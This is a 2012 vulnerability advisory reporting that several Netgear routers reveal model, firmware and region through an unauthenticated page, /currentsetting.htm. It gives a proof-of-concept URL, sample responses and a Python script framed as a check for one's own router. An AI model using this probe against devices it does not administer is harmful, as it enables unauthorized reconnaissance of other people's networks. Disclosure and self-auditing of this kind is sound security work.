Netgear Information Disclosure
Summary
Several NETGEAR devices are vulnerable to information disclosure via the web interface.
Description
| Models: | DGND3300v2, WNR2000v2, DGN1000, N300 |
| Firmware: | V2.1.00.48_1.00.48, V1.1.0.41WW, V1.0.0.34_29.0.45NA |
| Date: | 26/05/2012 |
| Severity: | Low |
| Impact: | Reveals model version, firmware and other info. |
| Attack Vector: | Remote without authentication |
| Solution: | No solution |
| Reference: | CVE not available |
Several Netgear devices are vulnerable to information disclosure. It is possible to obtain the model version, firmware and other information by visiting the URL /currentsetting.htm without authentication.
POC
Open the following URL:
http://<IP>/currentsetting.htm
Screenshot

Firmware=A2.1.00.48_1.00.48 RegionTag=DGND3300_WW Region=ww Model=DGND3300v2
Firmware=V1.1.0.41WW RegionTag=DGN1000_WW Region=WW Model=DGN1000
Firmware=V1.0.0.34_29.0.45NA RegionTag=WNR2000v2_NA Region=us Model=WNR2000v2
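
A defender-side check for a router you administer, as an added example that is not part of the original advisory: it parses the Key=Value response shown above and reports which of the four fields come back without credentials. The function names, the 4096-byte read limit and the handling of `<br>` separators are assumptions.

```python
import re
import sys
import urllib.error
import urllib.request

# Fields the advisory shows in the unauthenticated response.
DISCLOSED_FIELDS = ("Firmware", "RegionTag", "Region", "Model")

# Sample input: one of the response lines quoted in the advisory.
SAMPLE_BODY = "Firmware=V1.1.0.41WW RegionTag=DGN1000_WW Region=WW Model=DGN1000"

def parse_currentsetting(body):
    """Parse Key=Value tokens separated by whitespace or HTML tags such as <br>."""
    text = re.sub(r"<[^>]+>", " ", body)  # assumption: pairs may be split by tags
    pairs = {}
    for token in text.split():
        key, sep, value = token.partition("=")
        if sep and key:
            pairs[key] = value
    return pairs

def disclosed(body):
    """Return only the advisory's fields that are present in the body."""
    fields = parse_currentsetting(body)
    return {k: fields[k] for k in DISCLOSED_FIELDS if k in fields}

def audit_device(host, timeout=5):
    """Request /currentsetting.htm from one device, sending no credentials."""
    url = "http://%s/currentsetting.htm" % host
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status = resp.status
            body = resp.read(4096).decode("latin-1")
    except urllib.error.HTTPError as exc:
        # 401/403/404: the page is protected or absent, nothing is disclosed.
        return {"url": url, "status": exc.code, "exposed": False, "fields": {}}
    except OSError as exc:
        return {"url": url, "status": None, "exposed": False, "fields": {},
                "error": str(exc)}
    fields = disclosed(body) if status == 200 else {}
    return {"url": url, "status": status, "exposed": bool(fields), "fields": fields}

if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(audit_device(sys.argv[1]))   # address of your own router
    else:
        print(disclosed(SAMPLE_BODY))      # offline run on the sample line
```

Re-run the check after each firmware update or configuration change to confirm whether the page still answers without authentication.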
Pedro Joaquín
pjoaquin[]websec.mx

